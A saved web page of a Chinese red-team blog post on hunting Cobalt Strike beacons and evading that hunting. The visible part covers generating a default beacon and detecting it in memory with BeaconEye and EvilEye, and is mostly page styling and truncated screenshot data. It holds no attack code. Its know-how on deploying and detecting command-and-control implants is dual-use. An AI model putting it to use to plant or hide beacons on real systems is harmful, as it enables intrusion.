0;padding:1rem;border-radius:1rem}pre{display:block;font-family:SFMono-Regular,Consolas,Liberation Mono,Menlo,monospace;font-size:1.6rem;font-weight:400;line-height:2.6rem;overflow-x:auto;margin:2rem 0;padding:1rem;border-radius:1rem}pre code{display:inline-block;background-color:inherit;color:inherit}code{font-family:SFMono-Regular,Consolas,Liberation Mono,Menlo,monospace;font-size:1.6rem;font-weight:400;border-radius:.6rem;padding:.3rem .6rem;background-color:#ccc;color:#212121}img{max-width:100%}.wrapper{display:flex;flex-direction:column;min-height:100vh;width:100%}.container{margin:1rem auto;max-width:90rem;width:100%;padding-left:2rem;padding-right:2rem}.content{flex:1;display:flex;margin-top:1.6rem;margin-bottom:3.2rem}.content header{margin-top:6.4rem;margin-bottom:3.2rem}.content header h1{font-size:4.2rem;line-height:4.6rem;margin:0}@media only screen and (max-width:768px){.content header h1{font-size:4rem;line-height:4.4rem}}.content article a:where(.external-link)::after{content:"";padding-left:.5em;font-size:.75em}.content article footer{margin-top:4rem}.content article footer .see-also{margin:3.2rem 0}.content article p{text-align:justify;hyphens:auto}.content .post .post-title{margin-bottom:.75em}.content .post .post-meta i{text-align:center;width:1.6rem;margin-left:0;margin-right:.5rem}.content .post .post-meta .date .posted-on{margin-left:0;margin-right:1.5rem}.content .post .post-meta .tags .tag{display:inline-block;padding:.3rem .6rem;background-color:#e0e0e0;border-radius:.6rem;line-height:1.4em}.content .post .post-meta .tags .tag a{color:#212121}.content .post .post-meta .tags .tag a:active{color:#212121}@media only screen and (max-width:768px){}@media only screen and (max-width:768px){}@media only screen and (max-width:768px){}@media only screen and (min-width:768.1px){}@media only screen and (max-width:768px){}@media only screen and (max-width:768px){}@media only screen and (max-width:768px){}@media only screen and (max-width:768px){}.navigation{height:6rem;width:100%}.navigation a{display:inline;font-size:1.7rem;font-family:-a
<style media=screen>body.colorscheme-dark{color:#dadada;background-color:#212121}body.colorscheme-dark a{color:#42a5f5}body.colorscheme-dark h1,body.colorscheme-dark h2,body.colorscheme-dark h3,body.colorscheme-dark h4,body.colorscheme-dark h5{color:#dadada}body.colorscheme-dark h1:hover .heading-link,body.colorscheme-dark h2:hover .heading-link,body.colorscheme-dark h3:hover .heading-link,body.colorscheme-dark h4:hover .heading-link,body.colorscheme-dark h5:hover .heading-link,body.colorscheme-dark h6:hover .heading-link{visibility:visible}body.colorscheme-dark h1 .heading-link,body.colorscheme-dark h2 .heading-link,body.colorscheme-dark h3 .heading-link,body.colorscheme-dark h4 .heading-link,body.colorscheme-dark h5 .heading-link{color:#42a5f5;font-weight:inherit;text-decoration:none;font-size:80%;visibility:hidden}body.colorscheme-dark h1 .title-link{color:inherit;font-weight:inherit;text-decoration:none}body.colorscheme-dark pre code{background-color:inherit;color:inherit}body.colorscheme-dark code{background-color:#4f4f4f;color:#dadada}@media(prefers-color-scheme:dark){}body.colorscheme-dark .content .post .tags .tag{background-color:#424242}body.colorscheme-dark .content .post .tags .tag a{color:#dadada}body.colorscheme-dark .content .post .tags .tag a:active{color:#dadada}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}body.colorscheme-dark .navigation a{color:#dadada}body.colorscheme-dark .navigation a:hover,body.colorscheme-dark .navigation a:focus{color:#42a5f5}@media only screen and (max-width:768px){body.colorscheme-dark .navigation .navigation-list{background-color:#212121;border-top:solid 2px #424242;border-bottom:solid 2px #424242}}@media only screen and (max-width:768px){}@media only screen and (max-width:768px){}@media(prefers-color-scheme:dark){}@media only screen and (prefers-color-scheme:dark) and (max-width:768px){}@media only screen and (prefers-color-scheme:dark) and (max-width:768px){}@media only screen and (prefers-color-scheme:dark) and (max-width:768px){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}body.colorscheme-dark .footer a{color:#42a5f5}@media(prefers-color-scheme:dark){}body.colorscheme-dark .float-container a{color:#dadada;background-color:#424242}body.colorscheme-dark .float-container a:hover,body.colorscheme-dark .float-container a:focus{color:#42a5f5}@media only screen and (max-width:768px){body.colorscheme-dark .float-container a:hover,body.colorscheme-dark .float-container a:focus{color:#dadada}}@media(prefers-color-scheme:dark){}@media only screen and (prefers-color-scheme:dark) and (max-width:768px){}@media(prefers-color-scheme:dark){}</style>
<style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media(prefers-color-scheme:dark){}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><style>.sf-hidden{display:none !important}</style><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
<body class=colorscheme-dark>
 
<div class=float-container>
 <a id=dark-mode-toggle class=colorscheme-toggle>
 <i class="fa-solid fa-adjust fa-fw" aria-hidden=true></i>
 </a>
</div>
 <main class=wrapper>
 <nav class=navigation>
 <section class=container>
 
 <a class=navigation-title href=https://blog.aruiredteam.com/>
 Arui's blog
 </a>
 
 
 <input type=checkbox id=menu-toggle class=sf-hidden>
 <label class="menu-button float-right sf-hidden" for=menu-toggle>
 
 </label>
 <ul class=navigation-list>
 
 
 <li class=navigation-item>
 <a class=navigation-link href=https://blog.aruiredteam.com/posts/>Blog</a>
 </li>
 
 <li class=navigation-item>
 <a class=navigation-link href=https://blog.aruiredteam.com/friends/>Friends</a>
 </li>
 
 <li class=navigation-item>
 <a class=navigation-link href=https://blog.aruiredteam.com/about/>About</a>
 </li>
 
 
 
 </ul>
 
 </section>
</nav>
 <div class=content>
 
 <section class="container post">
 <article>
 <header>
 <div class=post-title>
 <h1 class=title>
 <a class=title-link href=https://blog.aruiredteam.com/posts/cobaltstrike%E7%9A%84%E7%8B%A9%E7%8C%8E%E4%B8%8E%E5%8F%8D%E7%8B%A9%E7%8C%8E/>
 CobaltStrike的狩猎与反狩猎
 </a>
 </h1>
 </div>
 <div class=post-meta>
 <div class=date>
 <span class=posted-on>
 <i class="fa-solid fa-calendar" aria-hidden=true></i>
 <time datetime=2024-05-31T00:00:00Z>
 May 31, 2024
 </time>
 </span>
 <span class=reading-time>
 <i class="fa-solid fa-clock" aria-hidden=true></i>
 3-minute read
 </span>
 </div>
 <div class=authors>
 <i class="fa-solid fa-user" aria-hidden=true></i>
 <a href=https://blog.aruiredteam.com/authors/arui/>Arui</a></div>
 <div class=categories>
 <i class="fa-solid fa-folder" aria-hidden=true></i>
 <a href=https://blog.aruiredteam.com/categories/cobaltstrike/>CobaltStrike</a></div>
 <div class=tags>
 <i class="fa-solid fa-tag" aria-hidden=true></i>
 <span class=tag>
 <a href=https://blog.aruiredteam.com/tags/redteam/>RedTeam</a>
 </span>
 <span class=separator>•</span>
 <span class=tag>
 <a href=https://blog.aruiredteam.com/tags/blueteam/>BlueTeam</a>
 </span></div>
 </div>
 </header>
 <div class=post-content>
 
 <h1 id=cobaltstrike的狩猎与反狩猎>
 CobaltStrike的狩猎与反狩猎
 <a class=heading-link href=#cobaltstrike%e7%9a%84%e7%8b%a9%e7%8c%8e%e4%b8%8e%e5%8f%8d%e7%8b%a9%e7%8c%8e>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h1>
<h2 id=0x01-前言>
 0x01 前言
 <a class=heading-link href=#0x01-%e5%89%8d%e8%a8%80>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h2>
<p>又到了xxx的时间了，在对红队基础设施的准备时写下的这篇文章</p>
<h2 id=0x02-开始狩猎>
 0x02 开始狩猎
 <a class=heading-link href=#0x02-%e5%bc%80%e5%a7%8b%e7%8b%a9%e7%8c%8e>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h2>
<p>CobaltStrike版本：4.9.1</p>
<p>不做任何配置启动teamserver</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>使用默认配置的生成x64位beacon，上线pid为3040</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<h3 id=0x021-beaconeye>
 0x021 BeaconEye
 <a class=heading-link href=#0x021-beaconeye>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h3>
<p><a href=https://github.com/CCob/BeaconEye class=external-link target=_blank rel=noopener>BeaconEye</a> 的核心原理是通过扫描CobaltStrike中的内存特征，并进行Beacon Config扫描解析出对应的Beacon信息</p>
<p>BeaconEye是基于.NETFramework 4.8框架开发的，至少需要.net4.0以上，为了解决真实环境下低版本服务器没有.net4.0以上的环境，可以使用<a href=https://github.com/akkuman/EvilEye class=external-link target=_blank rel=noopener>EvilEye</a>替代BeaconEye，EvilEye是Golang版本的BeaconEye</p>
<p>我目前使用的测试环境为Windows Server 2008，所以直接使用EvilEye进行检测，可以看到能直接从内存中提取出Beacon的信息</p>
<p><img loading=lazy src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABSMAAAJQCAIAAAD6xeYKAAAgAElEQVR4nO3dO5brShYgVj6pxqAlQzMoo8xyOSAZMmVmD0JLhqZQRpnlNcxsL3utbL9nkjJwHx4uPgeB+OBD7m1lEogPAiCJwxMA/tfvr8//7X//Px6Px//8n//zAQAAAOT6/vr8f/7f/+9/ObsbAAAA8FJE2gAAAFCTSBsAAABqEmkDAABATSJtAAAAqEmkfaau67quO74s0Hu399G7bS8AwFn+Nn9pfB72fD4TK+pLra0/Xxqvf4zEPtRd7XTt+tmi5pTjaqxW6ynbcsHtzXvzJvZqrvXRvnc0elV6FYzkuaPRqN0Lbi8AwK1Nc9qTkyrZj2EEWgzF8/nMPlstKfvC3u2Ifbftre5q76PWOeerbS8AwKv6Lac9nOH1p2L9v13XpZyZPZ/P/hzxRqdxm30ep9Rut3WvIeW4GhbtOmKvadf2PmaH5fidW7dXQ3OPA5OZe0ejbtOPcCTbtRtv8ottLwDAq1qYPT45az9MPPF1belw6j85R5yvs1Zz3J/xaMzPgCe/Taz1qv8jsUvzLdo7QzhlIui88s2RDEY4rjnuVcoeTDSvJGg3Zem8k/OC5dt7zBst5QqOksnn6dOPg9GYv1OybW5v05n2JeOc96vlfbc3pf552dbtAgAUqnlHtJJ8WjxrfXNOe9BoXLZWnxdrmARju1rZrDyl4N6yu9av26vNZNopx9X49YywJ6g52L+N8tKbSo6cXWWD0Zi/U84ajXZSxuqVtrrpcTX/watKuwAA5RZy2psyAo+9FY5TOpPU33AuvpgL2lVzeZ8f4TnxJFM372p88re2vUHZze0dd2mz6fjF9JpL9mCJuN3EY2Nto8q3d3M0NrdrXE+h9H2UUTY+ch7hOyW99XlDscJoNq/dXe+F4IDc2+7j8tu7t+xwqCx2rKRdAIAqKj/lq1b68fl8LoYlj/WTvM2pv3HNeX3e7FW2kprj7U1vel7t2N5elezBdvsoHquSH5XidlOWHp+FKznqgrJVjpxXykkmjvPLbHij42rtO6JKuwAAhXJy2i2iyiA70UtJ/+bVHLvXaW759gZhdmHf8tott9bzxLG64Dl6izkaQ23Vy973yGnXbuKYLP7Q88Lbm1E2nqRzr09vAODFVM5pP3LzMM+R/pVaJ0kpNb9M7ujRciQXKz9Mi32UMlZ5adhyr3RMPoqPnBcbjRQl8ynex3BIvNWxAQDcwkJOu1u5QLrcvObh9XErz5VrNTO6kVhzYJI/nNd/qRigfHvbOWCsgvT12srxWA0dzsgbx9t71pGz2W7Jm/1SYeHz9+ucDw5cC8c5o7e33t5Y4kSbxTfppY5JAOCt/PH99fmvf/9nSNytBRtjKedw83XimrOXbnYmZYsWq1rbhDhXPDnNnf+RsUXpZVO2d7JC4kimnECv1Rz3aldIkL4LNtvd1avFTpZsb9CreRPttjeuPP29v3d7H8nvlKD1vcdkvPuCgru2aG2F9HFOH+S423fZ3kfZcbX2u3D6Jz8AQF3fX59//8c/p7PHJ+ciFU9N4ppL/i1pt8S4quucw21ub8n03ex12u2FXQ1lH1eL+bqS7a118GS/FzYPjFrvsnPfGuM5C8c3uthuPM6FuejbbW96zXHlddsFAKjg++vz4+OjxVnIWRe4lrhjn9/N3ffR3v7ffXvruuNo3LHPJd5tewEAJr6/Pn9+furfEQ0AAADeWc5TvhLdcbbeHfv8bt5tH73b9sZuMRrvdoXwu20vAEAKOW2Aht4t7Hy37QUAWNQwpw3MiUNe3rvt4nfbXgCAFHLaAAAAUJNIGwAAAGqqH2l7xMubyz4AHDnvyX4HAOD1/Had9tr5bpXL8MaVTyps2u5ml9q1EmzyZqm19Vv3uVCj7q1VW9LcxUdykN7Pmx45z+ezD7Yv2DcAAMhTP6f9fD6dMT9mPx+8Q9auMJZz5Lytfr+/w3sEAIA3sXDv8UbRzubJ9CtFWfOY802ydi+/gQe7bCK6uj6zfXYvAACgjh1P+VqMHsev5E2WLm+3vOmheEor1efSx3XumhIc93n4e/zH2jCu1bM4VvOya13dLLs2RfyxspuCRYl7MKg2ltjttT6s7YX0RuM+3+X